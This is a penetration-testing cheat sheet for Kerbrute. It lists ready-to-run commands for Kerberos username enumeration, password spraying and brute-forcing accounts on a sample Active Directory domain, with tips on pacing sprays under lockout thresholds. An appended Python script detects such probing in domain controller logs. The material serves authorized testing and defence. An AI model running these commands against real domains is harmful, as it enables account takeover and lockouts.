CyberCheatsheets

Kerbrute Cheat Sheet

Fast Kerberos user enumeration and password spraying without LDAP.

Category: Active Directory & Windows | Tags: ad, enum, kerberos, spray | Updated 2026-06-02

Overview

Kerbrute abuses Kerberos pre-authentication to validate usernames and passwords against a domain controller. On some configurations this often does not trigger standard LDAP lockouts, but it can still lock accounts. Ethics: password spraying and user enumeration are active attacks; use only on domains in authorized scope with agreed spray policies.

Install

Release binary from GitHub (authorized use)

wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
./kerbrute_linux_amd64

Essential commands

./kerbrute_linux_amd64 userenum -d corp.local --dc 10.10.10.1 users.txt
./kerbrute_linux_amd64 passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Password1!'
./kerbrute_linux_amd64 bruteuser -d corp.local --dc 10.10.10.1 j.doe passwords.txt

Common workflows

User enumeration:

./kerbrute_linux_amd64 userenum -d corp.local --dc 10.10.10.1 /usr/share/seclists/Usernames/xato-net-10k-usernames.txt -o valid_users.txt

Password spray (one password, many users):

./kerbrute_linux_amd64 passwordspray -d corp.local --dc 10.10.10.1 valid_users.txt 'Spring2026!'

Single-user brute force (small list):

./kerbrute_linux_amd64 bruteuser -d corp.local --dc 10.10.10.1 administrator passwords.txt

Threading and delay:

./kerbrute_linux_amd64 passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Pass' --threads 10

Flags reference

Command / flag   Meaning
userenum         Valid usernames via Kerberos
passwordspray    One password, many users
bruteuser        One user, many passwords
-d               Domain FQDN
--dc             Domain controller IP
-o               Output file
--threads        Concurrency

Tips

  • Ethics: one password per spray window; align with domain lockout threshold (often 5 in 30 min).
  • Kerberos userenum is quieter than an LDAP anonymous bind on modern domains, but the domain controller still logs it (event IDs 4768/4771).
  • Valid users feed impacket-GetNPUsers, bloodhound, and nxc workflows.
  • Combine with enum4linux-ng / ldapdomaindump for the full picture.
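
The tips above note that these probes are still logged as 4768/4771. As an added example (not part of the original cheat sheet or of Kerbrute), this detection logic flags a single source address that fails against many distinct accounts inside a sliding time window. The tuple layout (time, event ID, client IP, account, status code), the thresholds and the sample events are assumptions and constructed data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# (event ID, Kerberos status) pairs treated as failed-probe signals.
# 0x6 = principal unknown, 0x18 = pre-authentication failed (bad password).
PATTERNS = {(4768, "0x6"): "user-enumeration", (4771, "0x18"): "password-spray"}

def detect(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {(source_ip, pattern): most distinct accounts seen in one window}.

    window and min_accounts are assumed starting values, not recommendations.
    """
    by_key = defaultdict(list)
    for ts, event_id, ip, account, status in events:
        label = PATTERNS.get((event_id, status.lower()))
        if label:
            by_key[(ip, label)].append((ts, account.lower()))
    findings = {}
    for key, hits in by_key.items():
        hits.sort()
        start = best = 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans at most `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            best = max(best, len({acct for _, acct in hits[start:end + 1]}))
        if best >= min_accounts:
            findings[key] = best
    return findings

T0 = datetime(2026, 1, 1, 9, 0, 0)
# Constructed sample events (not real logs):
#   10.0.0.50 fails on 12 unknown names in 12 s, 10.0.0.60 fails one
#   password on 8 accounts, 10.0.0.7 is one user mistyping three times.
SAMPLE = (
    [(T0 + timedelta(seconds=i), 4768, "10.0.0.50", f"guess{i}", "0x6") for i in range(12)]
    + [(T0 + timedelta(seconds=2 * i), 4771, "10.0.0.60", f"user{i}", "0x18") for i in range(8)]
    + [(T0 + timedelta(minutes=i), 4771, "10.0.0.7", "j.doe", "0x18") for i in range(3)]
)

if __name__ == "__main__":
    for (ip, pattern), count in sorted(detect(SAMPLE).items()):
        print(f"{ip}: {pattern}, {count} distinct accounts in one window")
```

Failures paced slower than the window stay under the threshold, so size `window` to the domain's lockout observation period rather than keeping the assumed default.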
